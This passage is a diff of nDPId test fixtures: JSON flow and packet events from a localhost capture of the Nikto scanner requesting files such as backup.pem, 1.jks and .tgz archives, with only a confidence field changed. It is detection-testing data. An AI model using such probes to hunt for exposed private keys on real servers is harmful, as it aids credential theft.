00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1576420276939,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276939,"pkt":"AAAAAAAAAAAAAAAACABFAADFJ3BAAEAGFMF\/AAABfwAAAcLkH5B8NB8+Bh651YAYAED+uQAAAQEICp1m+\/OdZvvzR0VUIC8xMjcuMC4wLjEuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276939,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276939,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276941,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1576420276941,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276941,"pkt":"AAAAAAAAAAAAAAAACABFAADCOKZAAEAGA45\/AAABfwAAAcLmH5ActAD4h3K22IAYAED+tgAAAQEICp1m+\/WdZvv1R0VUIC9iYWNrdXAucGVtIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276941,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276941,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276943,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1576420276943,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276943,"pkt":"AAAAAAAAAAAAAAAACABFAADCuRhAAEAGgxt\/AAABfwAAAcLoH5DBbYFGICWC9IAYAED+tgAAAQEICp1m+\/edZvv3R0VUIC9iYWNrdXAucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276943,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276943,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276945,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1576420276945,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276945,"pkt":"AAAAAAAAAAAAAAAACABFAAC9GW5AAEAGIst\/AAABfwAAAcLqH5C0ISE5HkW76YAYAED+sQAAAQEICp1m+\/mdZvv5R0VUIC8xLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276945,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276945,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276947,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1576420276947,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276947,"pkt":"AAAAAAAAAAAAAAAACABFAAC9hilAAEAGtg9\/AAABfwAAAcLsH5DmS75z\/EZQIIAYAED+sQAAAQEICp1m+\/udZvv7R0VUIC8xLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276947,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276947,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276949,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1576420276949,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276949,"pkt":"AAAAAAAAAAAAAAAACABFAADG8sFAAEAGSW5\/AAABfwAAAcLuH5DZeMrrTWBmVIAYAED+ugAAAQEICp1m+\/2dZvv9R0VUIC8xMjcwMC50YXIubHptYSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276949,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276949,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276950,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1576420276950,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276950,"pkt":"AAAAAAAAAAAAAAAACABFAADGIHlAAEAGG7d\/AAABfwAAAcLwH5AJERgjseiOe4AYAED+ugAAAQEICp1m+\/6dZvv+R0VUIC8xMjcwMC50YXIubHptYSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276950,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276950,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276953,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1576420276953,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276953,"pkt":"AAAAAAAAAAAAAAAACABFAADB609AAEAGUOV\/AAABfwAAAcLyH5CMSNMc4cqoooAYAED+tQAAAQEICp1m\/AGdZvwBR0VUIC8xMjcwMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276953,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276953,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) 